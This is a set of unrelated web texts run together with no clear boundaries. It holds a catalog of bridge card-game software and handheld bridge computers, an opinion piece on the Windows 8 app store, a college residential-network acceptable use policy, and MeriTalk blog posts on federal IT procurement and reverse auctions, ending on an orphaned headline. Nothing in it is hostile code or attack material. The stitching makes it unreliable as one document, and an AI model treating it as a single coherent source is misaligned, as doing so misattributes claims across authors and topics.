Play the world's most challenging and popular card game with "Omar Sharif Bridge 2". Enter the exciting world of Bridge, featuring new 3D graphics that bring the environments to life. Play a challenging game of Chicago or Rubber, or step up to play full teamplay Duplicate and Pairs tournaments! Omar Sharif Bridge II offers a game of intricate deliberation, skill and chance for the novice and expert. Features include:
Experience Bridge like never before with lavish 3D home, club and tournament environments. Sharpen your skills as you progress from the home to the club and then a major tournament!
Compete against 80 opponents with many styles and varying strength.
Offers Teamplay events and Pairs tournaments.
Master Card champion Omar Sharif shows you how to improve your game and takes you through the bids.
Chart your bridge career progression.
Challenge opponents with LAN and internet play!
Adjust your game settings to such rules as Acol, Standard American, 5 Card Majors, Standard English and Modern Acol. __________________________
Omar Sharif's Bridge Deluxe II is a superb update of Oxford Softworks' 1991 Omar Sharif on Bridge, also published by Interplay. Although the most obvious improvements are cosmetic - better graphics and lots of multimedia video starring Omar Sharif - Bridge Deluxe II also features much-improved software and numerous new options. The game contains a wide range of options that allow both beginners and experts alike to enjoy a game of bridge. There are over 20 playing options including conventions such as Stayman, Jacoby Transfers, Take-out Doubles and loads more. You can also choose to practice different strategies such as slam bids, and use the take-back and review options to analyze your game. In addition to full-motion video clips (including an extensive tutorial) starring Omar Sharif, the game has one of the best on-line reference materials on bridge around. You can browse an extensive guide to bidding and strategies, a how-to guide for scoring rubbers, and also a comprehensive glossary. __________________________
The unique Bridge 3000 is one of the most fully featured bridge games with superb multi-player gaming options and a great interface. This intelligent bridge program is suitable for bridge players of all standards, providing extra features for both novices and experienced players. Features include: Deep thought option. Bidding history preview. Network game mode for several players. Support for all major bidding conventions. Screen resolutions up to 1600x1200. Several different backgrounds. Abundant in-game sounds. High level of intelligence. Intuitive interface. 2D and 3D graphical interface. Many help options for beginners (including cheats). __________________________
3D Bridge Deluxe computer game (Mac, retail box) is a new (2011) product:
3D Bridge Deluxe is a great way for beginners to learn the game with its own tutorials that will give you enough of the basics to play online with real people and get rankings on the GameSmith Game Server.
Many Bidding Styles: Weak 2 Bids, Weak Jump Overcalls, Takeout Doubles, Cuebids for Slam Bidding, Blackwood Convention, Gerber Convention, Stayman Convention, Jacoby Transfers.
Voice recognition
3D animated, interchangeable, talking opponents
Card game engine enthusiastically recognized as the best in the world by the Macintosh community.
Hoyle Bridge Club is a friendly, funny new take on the classic card game. Choose from 11 unique characters, from zany goofballs to stiff businessmen - even a pirate and a puppy. All characters have their own voice-acting and playing styles, to make each game different. Along with standard bidding conventions, it also has game saves, reloads and hand replays. Also features a variety of backgrounds, card backs, and sound sets to make the experience more colorful.
Features include: Play online, against the computer, or the traditional way
3 classic Bridge games - Rubber, Chicago, and Duplicate
Adjustable skill levels and in-game tutorials
Deck of playing cards, official rulebook, and scorepad (if bought new)
Free Bridge Today magazine; membership to Bridge Club Live (if bought new)
4 & 5 card majors bidding
'Explain Hand' option gives bidding information and estimated high card points and distribution for each player
Includes a built in tutorial that offers a comprehensive Bridge lesson from beginner to intermediate club player levels.
A robust set of play options __________________________
Victorymul Bridge Butler is the perfect program for beginning players who want to practice basic bridge skills. Bridge Butler plays "Standard American 5-card Majors" including the Stayman, Blackwood and Gerber bidding conventions. With the help of 7 optional bidding conventions (Weak 2 bids, Weak Jump Overcalls, Negative Doubles, Jacoby Transfers, Unusual Notrump, Limit Major Raises, Michaels Cue-bids) and a variable 1NT range, you can also practice the "Standard American Yellow Card" (SAYC). The hint and replay features are great; the bidding, such an important part of bridge, is made more understandable by the ability to replay, which makes for a very good learning experience. If you enjoy playing rubber bridge you can play rubber after rubber, keeping a running score that lets you know how well you are progressing against the computer. __________________________
"World's Best Bridge" CD ROM is yet another bridge computer game, offering a fun and easy way to learn the game at home and to improve your play up to the expert level.
Features include: - Built-in tutorial to teach Bridge to beginners.
Gives tips to inexperienced amd improving players.
Various game options allow you to play Rubber Bridge, Chicago Scoring or Duplicate.
Choose from 12 bidding systems and play four or five card majors. __________________________
"Bicycle Bridge" 1999 Expert Software, Inc. CD-ROM version is an exciting way to advance your skills in this fascinating, classic bid and play game. Features include: -
Increasing levels of difficulty---a constant challenge for beginners and seasoned players alike
Advance your skills using on-screen tutorials, feedback, replay and hint features
The easiest menu-based interface of any card game software!
Dynamic animated card-playing characters to play with --- or against
Enjoy live card game action and simultaneous chat via network, modem, internet, or play for free on the Microsoft MSN Gaming Zone. __________________________
3D Bridge Deluxe, powered by our award-winning 3D Card games software engine, allows you to turn the tables on more experienced bridge players. With this program, beginners and seasoned players alike can learn the ins and outs of the game prior to taking the challenge to their weekly Bridge party as well as any opponent in the world via online play. Features include: - Many Bidding Styles: Weak 2 Bid, Weak Jump Overcalls, Takeout Doubles, Cuebids for Slam Bidding, Blackwood Convention, Gerber Convention, Stayman Convention and Jacoby Transfers.
Voice recognition.
Interchangeable, 3-D animated, talking opponents. __________________________
This must be one of the finest computer bridge games ever created. Take part in the world renowned "Bridge Olympiad" tournament, right in the comfort of your own home! Bridge masters are calling this bridge game software the most challenging ever! The computer will test bridge masters' abilities while being the mentor for novice players! Practice slams, defensive play, and how to play no trump hands. Choose the type of partner you want to play with. Each partner has different bridge techniques and styles! Features include:
Complete player history
The largest number of bidding conventions on the market
Tournament play
A myriad of computer players, each with a different playing style and personality
A great way to practice before an upcoming tournament
Full documentation on the CD
Artworx Bridge is the longest continuously published bridge game for computers. It was originally coded in 1977 and is now in its 8th version. Artworx Bridge 8.0 is a complete bridge playing program in which you and your computer partner bid against two computer opponents and then play out the hand. It is the perfect bridge game for novices: Bridge 8.0 includes an on-line bridge tutorial covering all aspects of the game. A hand editor allows you to create specific hands to practice your bidding and play. Not only does Bridge 8.0 deal millions of randomly generated hands, it also has an extensive hint mode that covers all bidding situations. Don't know what to bid? Ask Bridge 8.0 - it will tell you and give you the reason! Features include: Play contract or duplicate bridge. Bidding is Standard American five-card majors with Stayman, Blackwood and Gerber conventions. Choose weak or strong 2-bids. Modify your partner's and opponents' bidding styles.
GOTO Bridge is an educational software package backed by one of France's emerging stars, Jérôme Rombaut. It is designed as an educational program, and offers a wide range of features that are sure to be of use to any aspiring player. Once you have completed the simple installation you are invited to play 20 deals so that your skill level can be analysed. You are able to compare your results against those achieved by other players under tournament conditions. (The Editor is prepared to reveal that they are testing - and that with a degree of luck he managed to score 68%, putting him at the top of the ranking list.) There are a host of features that enable you to practise specific areas in both bidding and play and you can also test yourself against the best by trying the deals from the 2009 World Championships. The graphics are outstanding and there is a detailed booklet explaining how to make the most of the various features.' - Mark Horton, BRIDGE magazine.
play the deals of the 2009 World Championship in Sao Paulo
More than 10 000 deals with comparison
Lessons and exercises: to excel in the card game
Commented deals: you play then you consult the commentary
Practice: quizzes, rubber deals, pre-scored tournaments, bidding sequences, etc.
Eddie Kantar is one of the world's most famous players, and Eddie Kantar's Bridge Companion is one of the few bridge games that focus on teaching the basic rules. The game incorporates three popular bidding systems: Goren, 4-card majors, and 5-card majors. The highlight of the game is the many excellent card-playing tutorials that teach you the basics as you play the game. Ed Kantar doesn't offer any lessons on advanced bidding. If you are new to the game, Ed Kantar is a good game to start with. Intermediate and advanced players should look for something more challenging.
"Interactive Bridge" by ValuSoft brings exciting Bridge action to your desktop, with the software having all of the features of the real game. Play with the computer or with a friend. Includes 13 bidding conventions, and an interactive tutorial!
Micro Bridge is adjustable to any of the ten skill levels. There are many conventions and gadgets available so you can design your own system. You can select random deals or choose from a tremendous variety of deal types, which is very handy for bidding practice.
Bridge Bidding Conventions and other Practice CDs
Volume 1: Stayman
Jacoby Transfers
Weak Two-Bids
Michaels Cue-Bids
Jacoby 2NT
Negative Doubles
Beginning bridge players will appreciate the friendly and clear teaching style of the "Learn and Practice Bidding Conventions vol 1, vol 2 & vol 3 " CD-ROMs. All bridge players will love the opportunity to practice conventions and continuations in detail. Practice conventional bids, responses, and rebids on thousands of deals with feedback tailored to reinforce conventional understandings and correct bidding mistakes. Either learn a convention from scratch or practice using a convention you already know. You can learn and practice many bidding conventions with detailed explanations and interactive quizzes.
Volume 2: Stayman
Weak 2's
Takeout Doubles
Preempts
Strong 2 Club Openers. Volume 3: Unusual 2NT
Splinters
Limit Major Raises
Forcing 1NT
Negative Doubles
These two CD-ROMs each cover three books from the 'Practice Your Bidding' series of books by Barbara Seagram. "Practice Your Notrump Bidding (CD-ROM)" covers Stayman Auctions, Jacoby Transfers and Four Suit Transfers. "Practice Your Slam Bidding (CD-ROM)" covers Jacoby 2NT, Splinter Bids and Roman Keycard Blackwood.
"Marty SEZ... Bergen's Bevy of Bridge Secrets" is the interactive CD-ROM of Marty Bergen's book with software by Fred Gitelman. Marty Bergen is a 10-time North American Champion and one of the leading bridge writers and teachers in the world today.
Points Smoints, by Marty Bergen
An interactive software product based on the best-selling book "Points Smoints" by Marty Bergen. This CD-ROM has plenty of example hands and quizzes and a wealth of useful advice that will have a major impact on your results at the bridge table.
Modern Bridge Defense, by Eddie Kantar
This interactive edition of Eddie Kantar's book is an educational and fun software product that presents the same material in interactive mode (including opening leads, signaling, second and third hand play and discarding), giving you a chance to try the questions, practice hands and tests. The animated diagrams make following the play a snap.
Advanced Bridge Defense, by Eddie Kantar
This interactive CD-ROM presents the same material as the book in interactive mode. Advanced defensive play has never been explained more clearly. Topics such as defensive strategy, inferences, counting techniques, how to develop extra trump tricks, false carding and lead directing doubles are explained so thoroughly that even experts will benefit from studying them.
Topics in Declarer Play, by Eddie Kantar
This interactive edition is an educational and fun software product that presents the same material as the book in interactive mode, including entry management, long suit establishment, finessing, the dreaded counting and how to plan a strip and end play. Test yourself with the numerous quizzes that follow.
Countdown to Winning Bridge, by Tim Bourke
The "Countdown to Winning Bridge" CD-ROM by Tim Bourke and Marc Smith is based on the authors' book of the same title. This interactive software program teaches the essential skills involved in counting bridge hands.
"Discover Bridge, Play with Eddie Kantar" an exciting new (2010) CD-ROM from one of the world's foremost bridge teachers.
Learn to play Bridge CD-ROM
Pat Harrington teaches you how to play bridge. You will learn to play bridge from scratch. No prior knowledge is required. This disk takes the best material written by one of the world's best teachers and computerizes it using the interactive and easy-to-use Bridge Baron Teacher interface, so that you can learn on your own time, with no pressure, in the privacy of your home, and at your own pace. Makes a great companion for students taking a bridge course with an bridge teacher, but is also detailed enough to stand alone. Features of "Introduction to Bridge (lessons 1-6)" include: Teaches both bidding and play
Paced appropriately for beginners
Lessons 1-3 teach the mechanics, trick taking, and provide the background for bidding
Lessons 4-6 teach opening bids and their responses
Quizzes to reinforce your understanding
Provides an extensive glossary and reference section
Includes 38 carefully crafted instructional deals, and 92 BONUS practice hands
Presented in an easy-to-use, interactive format.
Disc 2: Introduction to Bridge (Lessons 7-13), Play and Learn with Pat Harrington, is the next in the series:
Lesson 7: Dummy Points
Lesson 8: No Trump responses and rebids
Lesson 9: No Trump bids by opener
Lesson 10: The take-out double
Lesson 11: Pre-empts
Lesson 12: The strong 2 club opening
Lesson 13: Stayman
"Bridge Coach - SAYC" is designed for players looking to practice their Standard American Yellow Card bidding and improve their bridge game in a safe environment that allows you to proceed at your own pace. The disk contains 250 complete deals; the earlier deals are simpler hands where you learn basic concepts and maximum guidance is provided while playing the deals. As you advance further into the program you will encounter more sophisticated bidding and also be given more freedom in the play of the hand. ____________________________________________________________________
Learn Bridge CD is the first complete interactive teaching program on CD. It uses video and animation to present 40 interactive lessons on basics, bidding, defense and play. It contains material from the world's best bridge teachers in easy-to-use interactive lessons. Lessons 1-6 start with the absolute basics, introducing trick taking, trump suits, and bidding; then going onto the play of the hand and bidding. There is an unlimited number of quizzes, so you can practice as much as you like. It is based on Standard American bidding, with 5-card majors and 15-17 no trump openings. Learn Bridge teaches Stayman, Blackwood, Strong 2 Club Opening, and Weak Two Bids. It is recommended for absolute beginners to intermediates. Easy to install and operate.
Hand Held Bridge Playing Computers
Now you can play bridge anywhere to stay card-sharp, or learn how to play, with Excalibur's LCD Bridge. Excalibur Research Labs teamed up with international champions and officials to bring you the latest in Bridge technology. This new handheld uses 500 hands carefully researched and compiled by a panel of Life Masters and Grandmasters. Each hand is accompanied by a short commentary that explains strategies, vocabulary and other winning tips. Choose from two levels of difficulty, novice and intermediate. Uses contract bridge scoring and official SAYC bidding.
Expert hints for bidding and playing
Complete bidding of hand any time
Auto replay
Computer scoring to assess your skill __________________________
The Pro Bridge 311 is the world's strongest hand-held bridge computer and has extensive features; different screen selections allow all the cards to be viewed simultaneously. Users can select from the following bidding conventions: American Standard, ACOL, French Standard, and the French Strong Two. Pro Bridge plays and keeps the score in either Rubber Bridge or Duplicate Bridge. There is a choice of random shuffle (which simulates a normal deck of cards being shuffled), manually choosing the cards you would like dealt, or choosing from nearly 1 million hands in the computer's permanent deal library. The computer can suggest hints if you like, and has a take-back function if you want to try rebidding a hand, or replaying different cards. Features of the Pro Bridge 311 include:
Pocket-sized (4.5" x 8") bridge computer allows you to play anywhere, anytime.
Strong program that plays the following bidding systems: American Standard, ACOL, the French Standard, and the French Strong Two.
Large (2.5" x 3") easy-to-read LCD screen
Ideal for players of all skill levels.
Automatically shuffles and deals, scores, and follows suit. Hint key will give suggestions.
No cards to lose Sound effects (can be disabled) Includes instructions for the following languages; English Requires 4 AAA Batteries ____________________________________________________________________
"Bridge and Backgammon" is a combined CD-ROM with both games. The bridge can be played against the computer or you can hook up to the internet to play online. The computer bidding standard is really good and you can select which bidding conventions and preferences you want. Also, if you don't know why a bid was made, you can click on that bid and the computer will interpret it for you. You can select to play open hands or choose the cards for each hand so you can set up certain hands and study them. It's great! The backgammon is fun too,
for the beginner who wants to become good at backgammon, this software is highly enough. With serious, persistant effort one can become a fine player in record time using this CD. It trains your mind without your even seeing it work.
Search over 800 bridge books on this site.
Search for other items at Amazon.com
Search for other items at Amazon.co.uk
Enter author, title or descriptive words.
go to the Bridge shop or UK bridge CD-ROMs or Bridge book authors or Bridge book review index or page:
B1, B2, B3, B4, B5, B6, B7, B8, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 89, 98, 99.
Visit Bridge Books website for a list of bridge books categorised by content and level. | 计算机 |
5 reasons why the Windows 8 Store is a complete mess
The Windows 8 app store is perhaps the most controversial feature in Microsoft's new operating system. Windows has thrived for decades because of its openness to developers and willingness to let them take both the spotlight and the profits. Some developers – like Markus Persson, the creator of Minecraft – have denounced Microsoft's store as a blatant attempt to make Windows a closed platform.
The store is full of shovelware
Windows 8 is not Microsoft’s first attempt at a store. The company already created two for Xbox Live. One, Xbox Live Arcade, is a pleasant curated experience filled with games that range from playable to amazing. The other, Xbox Live Indie Games, is an anything-goes mess.
Microsoft has used the latter to model the Windows 8 store. While there are some decent apps, many are shovelware. They either don’t work as advertised or work poorly. And some stand on questionable legal grounds.
The first two paid apps shown in the Entertainment section, for example, are fake versions of Windows Media Player. Both use logos that probably wouldn’t pass muster in a copyright case. We’d imagine that Microsoft itself would want these apps shut down for infringement – instead, they’re the number one and number two results on its own app store.
Similar problems can be found elsewhere. Two of the top 10 apps in the Photos section are nothing more than photo collections featuring attractive women (sold without the photographer’s or model’s permission, we’re sure). News & Weather is dominated by useless apps that provide far less information than websites on the same topic. And the Social category is populated by unofficial apps for every major social network – including Facebook, Pinterest, and Adult Friend Finder.
While the App Store has taken flak for its closed approach, Apple should also be given credit. When Apple opened its virtual doors it took responsibility for the store’s quality. Microsoft, however, seems to view the Windows Store as a source of passive revenue. Details like quality control have been brushed aside. Plenty of ports, but few original games
Apps in Windows 8 should ideally be designed for the operating system – and many are. Yet some categories, particularly games, are dominated by ports. Nine of the top 10 games in the paid games section are ports from iOS or Android. The outlier is a port from the Xbox 360.
Ports can be great when refined to take advantage of a new platform, but most games on the Windows 8 store don’t bother. Instead, most are scaled down versions of existing smartphone apps. That means pixelated graphics, comically over-sized buttons, and simplistic touch controls that don’t work well with a two-pound tablet. Strangely, apps for the iPad – which would be a better fit – haven’t come to Windows 8 in great numbers.
Some developers are using Windows 8 to cash in on their existing clout, and shame on them. But Microsoft also deserves blame. After talking up gaming in Windows 8, the company has done nothing to promote, police, or curate the games available. Top Xbox titles are absent such as Mark of the Ninja, The Walking Dead, and Fez. Search is busted
The proliferation of shovelware in the store’s “Top Paid” and “Top Free” lists might force users to abandon them in favor of search. Just one problem – search is terrible.
Some specific searches are handled well enough. For example, typing “Netflix” gives us the Netflix app; looking for “antivirus” calls up 34 options, and most of them are from reputable developers. But other common searches return baffling results: a Blackjack app is the top result for “strategy games”; the first result for “keyboard” is a virtual piano; and only half of the top 10 results for “organization” have anything to do with the topic. Microsoft’s anything-goes attitude compounds the problem. The top social apps on the Windows 8 store may be ripoffs, but they’re nothing compared to what we found when we searched for “Facebook.” A half-hearted album uploader? Why not! Two “Facebook Lite” apps from different developers? Sounds good! An app with copyright-infringing images cropped to create Timeline covers? Awesome!
Even if the content was fixed, the functionality of search would be limited. Users can refine only by category and price category (free, free and trial, or paid). Results can then be filtered by relevance, newest, rating, or highest/lowest price – and that’s it. There are no sub-categories and no fine-grain filters. Promotions are rare (and boring)
Successful online stores strongly promote the products found inside, creating a perception of value and excitement. Some promotions can even be useful. Steam, for example, has a new deal almost every day as well as a prominent featured product section that rotates automatically or can be browsed at will, which makes hot games easier to find.
Microsoft has ignored this principle and offers nearly no promotion in the Windows 8 store. The “spotlight” area lists only three apps, all of which are free, and two app sub-sections, both of which are filled with just a handful of options.
Only one of these two sub-sections is advertised as a sale, and all the apps in that section are free. Are they normally not free? Who knows! Microsoft doesn’t bother to say. Blunders like this are made worse by the lack of new content. Spotlight promotions are rotated infrequently, and category-specific promotions suffer the same problem. There’s also not enough promoted content. Both the App Store and Google Play have numerous best-of and must-have lists, which help customers find great apps and become excited about the platform. Microsoft’s only recurring efforts are the “top paid” sections which, as already discussed, are full of shovelware. Strong product promotion would help Microsoft push subpar apps out of the spotlight, spark consumer interest, and make the store easier to navigate. Without it, the store has turned into a free-for-all that encourages developers to push out terrible apps with clever or deceptive names.
The user interface is awful
We’ve noticed that our interaction with the Windows Store is dominated by swipe-to-scroll. Browsing the entire storefront on the Acer Iconia W700, for example, usually requires three or four big, sweeping swipes. That’s unusual. The front page of the App Store requires only one swipe when viewed on the iPhone 5 and the same is true of Google Play on the Nexus 7.
Loading the Windows 8 store always brings users to the Spotlight section (shown above, center). This, as mentioned, only lists a handful of featured apps and categories. Most devices will also display a “manufacturer’s picks” section – and that’s it. Nothing else is visible.
The App Store on the iPhone 5 (shown above to the left of the Windows Store) manages to do far more with its relatively tiny 4-inch-wide display. The Featured section includes a rotating banner, a scrollable “New and Noteworthy” section, and links to two separate areas containing apps that Apple thinks will be ideal for new users. There’s also a navigation bar at the bottom of the store.
Google Play on the Nexus 7 (shown above to the right of the Windows Store) does even more. Every category in the store is presented immediately. There’s no need to scroll at all, and Google still finds room for three featured promotions.
The Windows 8 store is designed as if it’s a retail store with only one aisle. Oh, you’re looking for men’s clothing? That’ll be 300 yards straight ahead, on the left, past the frozen foods.
The lights are on, but nobody is home
When we say that the Windows 8 store is a disaster, we mean it. Things could only be worse if the servers that run it caught fire, though even that would give Microsoft a chance to start over. The store fails by almost every measure by which a store should be judged, including selection, quality, and organization.
We reached out to Microsoft to give the company a chance to comment on why the store has been allowed to go live in such a sorry state. The reply we received was a pre-baked PR line: "Microsoft is proud of the quality apps that are currently available in the Windows Store and look forward to adding more innovative apps from the Windows developer community who continue to submit new apps every day."
Microsoft is proud of this? Really? The current incarnation of the store sells apps with deceptive names, apps that infringe on copyright (including those owned by Microsoft), and apps that are straight ports from mobile platforms. There's nothing to be proud of. This is why the company is difficult to take seriously despite its healthy profit and strong position in the PC market. How does such a spectacularly terrible service manage to slip into the world's most popular operating system? Was no one paying attention? Did no one care? We don't know the answers to those questions, but we do know that Microsoft needs to find them. The future of the company depends on it.
ResNet Acceptable Use Policy
The purpose of this Policy is to ensure an available, reliable, secure, and responsive computing environment for all Residential Network (ResNet) users.
Users' responsibilities:
ResNet Users are responsible for all use of their network connection, whether such use is by the subscribing user or others allowed to use the connection by the user.
Users must have a computer system that meets the minimum requirements of the ResNet Program as outlined on the ResNet Web Page.
Users must abide by state and federal laws and by the College of St. Scholastica Computer and Network Policy and Password Policies and any other applicable policies that are developed and distributed. Such policies are available at the Information Technologies Web Page.
Key points from these policies include:
If any use adversely impacts the network, the user will be asked to schedule his or her work outside of regularly scheduled hours (8 a.m. - 5 p.m. Monday - Friday) or to confer with the Information Technologies Department to reconfigure his or her work so that network impact is avoided.
Acceptable use always is ethical, reflects academic honesty, and shows restraint in the consumption of shared resources. It demonstrates respect for intellectual property, ownership of data, system security mechanisms, and an individual's right to privacy and to freedom from intimidation, harassment, and unwarranted annoyance.
Do not aid or allow any unauthorized person to use College computer or network equipment and do not provide access or use of your account to any other individual or group.
Do not break into accounts or bypass security measures in any way.
Only computers belonging to current CSS students residing in the residence halls may be attached, directly or indirectly, to the network connection provided. Attaching another computer, configuring your computer to act as a server, or using any other type of connection is not permitted. You may not extend or re-transmit network services in any way and you may not provide Internet access to other users by using your networked computer as a bridge or gateway.
ResNet staff may require access to a user's computer to maintain the network hardware and software. Upon 24-hours notice, users agree to provide reasonable access to their machines and to the necessary modifications required to provide network communications (e.g., installation of TCP/IP applications).
Users agree to abide by the license agreements governing the use and distribution of the software installed on their machines.
Information Technologies Support Responsibilities
ResNet staff may need to disable hardware or software that is incompatible with the network resources. We cannot guarantee functionality if hardware and software is added at a later date. ResNet staff may have to return the computer to its original configuration in order to test and troubleshoot network connectivity problems.
Key points to ResNet and User responsibilities are as follows:
CSS students residing in the residence halls may install other software packages and Internet applications on their own computer's hard disk as long as they do not violate any of the previously referenced policies. Users must install and support these other applications themselves.
CSS students residing in the residence halls may install peripheral devices on their personal computer (e.g., sound cards, video cards, joysticks) as long as they do not violate any of the previously referenced policies. Users must install and support these other devices themselves.
For assistance with troubleshooting ResNet installation or problems, contact the Computer Support Help Desk, ext. 5911.
The College's network is designed to be used for College purposes. The College cannot guarantee the security and integrity of any information placed on the network, including personal data, programs placed on the network, or individual workstations. We recommend that all significant data be backed up on a regular basis.
The network is owned by the College and the College maintains the right to provide further regulation, as it deems appropriate, to limit use or access, and to monitor the systems used for security purposes. Users, by their use of the network, accept the College's rights in this regard. The College does not intend, as a matter of Policy, to monitor the use of technology (including e-mail) and will respect individual privacy to the extent feasible. However, the College expects users to be responsible in their use of the network. Faculty, staff, employees, students, and agents of the College agree to refrain from any private communication which suggests that there is College approval of such communication. Further, the Information Technologies group may, if it deems it necessary or appropriate, conduct monitoring of resources in order to ensure reasonable maintenance of system hardware, software, data, network traffic, or security. If such monitoring involves the reading of file information, e-mail, or documents, or accessing the user's computer, the owner of the resources will be provided prior notice, whenever possible.
In the event that this Policy is questioned, the Chief Information Officer of Information Technologies, and the Information Technologies Resources Committee are authorized to provide interpretation of this Policy.
If a user performs a function that adversely impacts others on the network, he or she will be required to terminate that work immediately. Any further violation of this Policy may lead to the loss of network privileges as approved by the appropriate Dean or Vice President. Offenders may be subject to College disciplinary procedures as well as criminal or civil prosecution. Any appeals should follow appropriate College grievance procedures.
Modifications to this Policy
The Policy and Procedures Committee at the College reserves the right to modify this Policy at any time. Users of the system will receive prompt notification of all modifications.
Updated: April 12, 2006, by Lynne Hamre
MeriTalk - Where America Talks Government
Why the IT Procurement Debacle Did Not Need to Happen
Tags: e-Procurement
When the President of the United States calls out the Federal IT acquisition process, we know we have a problem. Acquisition seldom gets any ink at all unless something goes wrong, but it is particularly notable when the IT-User-In-Chief spends time on it. How did the Federal IT community find itself in a situation where procurement rules contributed to, but certainly weren't mainly responsible for, the failure of a major national IT initiative?

First and foremost, it is imperative to understand that this did not need to happen. Commercial item acquisition rules were streamlined less than 20 years ago and, along with them, specific changes were made that were designed to make IT acquisition faster, more competitive, and deliver great value for every dollar spent. Commercial item acquisitions were, for a time, exempt from a host of government-only buying rules. Federal IT users did get "today's technology today." The technology gap that existed in the late 80's and early 90's was significantly narrowed, if not closed altogether.

So, what happened? Perhaps the most significant impact on the commercial IT acquisition rules of today comes from changes made because of contracting problems related to the wars in Iraq and Afghanistan. While these problems were not, of course, specifically related to commercial acquisitions, those acquisitions were covered by new rules anyway. Any seasoned Congressional staff member will tell you that this is what happens when Congress applies its "meat axe" approach to a problem requiring a more narrow solution. Federal IT acquisition rules became collateral damage in the process of trying to clean up war-time contracting.

New rules mandating transparency of executive pay, how costs are allocated, the need to make mandatory disclosures of suspected problems, and the ability of any interested party to see your company's tax, environmental, labor and other compliance issues all created significant burdens for IT contractors. Add to this significantly increased IG oversight, and a Federal IT market is created where only specialized firms with enough resources to dedicate to these government-only requirements can participate.

Let's stipulate here that no one is in favor of fraud, waste, and abuse. Companies and the government officials they work with should be honest. We all want government money to be spent wisely, right?

If you just answered "yes" to this question, though, you have to agree that it is not being spent wisely now. Round-the-clock fixes to Healthcare.gov don't come for free. Neither do compliance systems for government-only requirements. Another cost is the loss to the government of the commercial expertise of IT firms that won't even enter the market because of current hurdles. The government pays a price for the current regulatory burden, whether directly or indirectly.

It is past time to strip away non-essential rules meant for weapons systems procurements or government-only solutions, but that are now applied to commercial firms as well. In addition to this, contractors need to stop being uniformly viewed with suspicion. There is a lot that industry and government can do together to return Federal IT procurement to the state of moving "at the speed of need". Applying common sense to determine what a positive Federal IT acquisition outcome would look like is a good place to start.

Larry Allen is a MeriTalk contributor and President of Allen Federal Business Partners. To share your thoughts on Federal IT acquisition, please leave a comment below.
IT Commoditization? Are we bringing back Murphy Brown?
Tags: Enterprise Applications
It was the year in which Bryan Adams sang "Everything I Do, I Do it For You." The first George Bush was President and the Giants beat the Bills in the Super Bowl. Yes, 1991 was chock-full of history. No, this isn't a trip down memory lane, but a reminder that if you stick around in Federal IT long enough, acquisition trends have a way of coming back to haunt you. So it is with IT commoditization and other "new" trends that sound familiar to those of us with long memories.

1991 marked one of the last years that the Federal government purchased IT mostly as a product. The iconic Desktop IV contract, and its contemporaries, was primarily a product-based deal designed to drive prices as low as possible with limited competition. Contractors fought tooth and nail for these contracts. Implementation was delayed by successive rounds of protests as the stakes were high. This may sound familiar to companies involved in recent discussions surrounding reverse auctions, or even plans by GSA to expand its Strategic Sourcing program to include "commodity IT" products. Recent reports that more and more agencies are using modular contracting to obtain IT solutions also come to mind. Low price is again king in the Federal market and there is more than a passing glance at de-coupling IT product purchases from network services.

Before everyone gets carried away, though, let's remember that there are good reasons why there was no Desktop V contract. First, the government realized that approaches like the Desktop program were a great way to get yesterday's technology at a premium price. By the time protests were resolved, the technology had changed. Buyers either had to use outmoded technology or pay a comparatively higher price for current market products. Ironically, lower prices and greater levels of competition were often available on GSA Schedule contracts within 24 hours after an initial Desktop award was made. Second, the government realized that they had some serious compatibility problems. While the modular, product-based approach may have served the needs of Wednesday's buyer, there was no guarantee that it would work with what someone next door bought on Thursday.

Lastly, the government realized that it wanted the services of an IT system, more than it wanted to own and manage the system itself. Providing a functional system became the job of contractors, while agencies were allowed to focus more on fulfilling their core missions. While IT solution purchases have not been without their own issues, the government now benefits from having much better compatibility across IT platforms and has ready-made contract vehicles that assure agencies get today's technology today. Continuous improvement is certainly called for, but does anyone really think that government IT systems would function at all if the government had stayed with a modular, product-based acquisition model? We'd have a cloud all right, but it would be a cloud of confusion.

All of this is worth remembering before IT executives in industry and government "Join the Joyride" toward acquisition practices that were used over 20 years ago and found lacking. Commoditization brings a strong lure of low prices, but there is no free lunch – only higher prices to pay for incompatibility and non-transparency. These are relics that need to be remembered as well, but as a reminder that we don't want to relive this part of our past.
Contractors Should Cast a Wary Eye on Case/Leonsis Investment in FedBid
The recent announcement in The Washington Post that Revolution Growth, the equity firm owned by Steve Case and Ted Leonsis, made a significant investment in online reverse auction tool FedBid should be met with a wary eye by government contractors. The move signals that FedBid will get a nice infusion of cash, and some well-connected investors who have publicly stated that they want the company to become an online marketplace for billions of dollars in government procurement. The timing of the acquisition coincides with a drive already underway in many Federal agencies to use low price, technically acceptable procurement standards as the sole standard for conducting all of their procurements.

Many contractors have long been uneasy with FedBid as the company aggressively marketed its reverse auction tool to Federal agencies for all sorts of procurement actions. It is not so much a concern with the company's sole emphasis on low price, as it is that the firm encourages the use of reverse auctions in situations that aren't suitable for its use. Additionally, FedBid fees have in the past been less than transparent, making it difficult for a winning contractor to know what its own net price was.

While reverse auctions can be well-suited to commodity purchases and other simplified acquisitions, the format does not lend itself well to the acquisition of professional services or to projects such as enterprise-wide IT solutions. When reverse auctions were first used in government in the early 1990's, both buyers and sellers sometimes realized after the fact that they had either awarded or won a procurement that was not executable because the reverse auction format had not allowed for consideration of multiple variables. The result was either a re-procurement or a significant and costly adjustment to the original award price.

FedBid is already big business. Last year the company assisted with 20,000 procurement actions valued at more than $1.4 billion. Agencies using FedBid can conduct open market procurements, or use existing IDIQ contracts like GSA Schedules or Alliant. As such, an agency decision to use existing contracts does not preclude them from using FedBid as well.

Ted Leonsis will become FedBid's new Chairman. Among those serving on the board will be retired Army Chief of Staff George Casey. It seems clear that FedBid will have easy access to the top echelons of government and be able to sing the siren song of lower costs into the ears of those who may not understand that no customer, even the Federal government, should always purchase based on cost alone.

Any advocate for common sense acquisition – contractor or government buyer – needs to be prepared to show that reverse auctions have their place, but are only one option that the government should examine. The commercial sector uses this mechanism for certain purchases, but not all. The reasons why this is so should be made clear. Similarly, not every procurement action should be solely evaluated on price alone.

The message from common sense acquisition advocates needs to be clear, concise, and frequently heard. You can be sure that the message from Revolution will be.
Where Your Cloud is Should Matter: Why New Rules May Be Needed to Maintain Common Sense for IT
